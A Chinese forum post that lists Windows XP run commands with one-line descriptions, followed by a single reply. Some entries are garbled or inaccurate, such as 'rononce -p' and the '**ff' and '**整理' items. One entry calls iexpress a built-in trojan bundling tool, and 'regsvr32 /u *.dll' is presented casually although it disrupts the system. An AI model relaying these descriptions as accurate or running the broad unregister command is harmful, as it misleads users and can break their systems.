net stop messenger-----停止信使服务
net start messenger----开始信使服务
notepad--------打开记事本
nslookup-------网络管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕"讲述人"
ntmsmgr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
netstat -an----(TC)命令检查接口
syncapp--------创建一个公文包
sysedit--------系统配置编辑器
sigverif-------文件签名验证程序
sndrec32-------录音机
shrpubw--------创建共享文件夹
secpol.msc-----本地安全策略
syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码
services.msc---本地服务设置
Sndvol32-------音量控制程序
sfc.exe--------系统文件检查器
sfc /scannow---windows文件保护
tsshutdn-------60秒倒计时关机命令
tourstart------xp简介(安装完成后出现的漫游xp程序)
taskmgr--------任务管理器
eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打开资源管理器
packager-------对象包装程序
perfmon.msc----计算机性能监测程序
progman--------程序管理器
regedit.exe----注册表
rsop.msc-------组策略结果集
regedt32-------注册表编辑器
rononce -p ----15秒关机
regsvr32 /u *.dll----停止dll文件运行
regsvr32 /u zipfldr.dll------取消ZIP支持
cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁盘检查
certmgr.msc----证书管理实用程序
calc-----------启动计算器
charmap--------启动字符映射表
cliconfg-------SQL SERVER 客户端网络实用程序
Clipbrd--------剪贴板查看器
conf-----------启动netmeeting
compmgmt.msc---计算机管理
cleanmgr-------**整理
ciadv.msc------索引服务程序
osk------------打开屏幕键盘
odbcad32-------ODBC数据源管理器
oobe/msoobe /a----检查XP是否激活
lusrmgr.msc----本机用户和组
**ff---------注销命令
iexpress-------木马捆绑工具,系统自带
Nslookup-------IP地址侦测器
fsmgmt.msc-----共享文件夹管理器
utilman--------辅助工具管理器
gpedit.msc-----组策略

网友A:
这个帖子好长。不过现在DOS还是在用的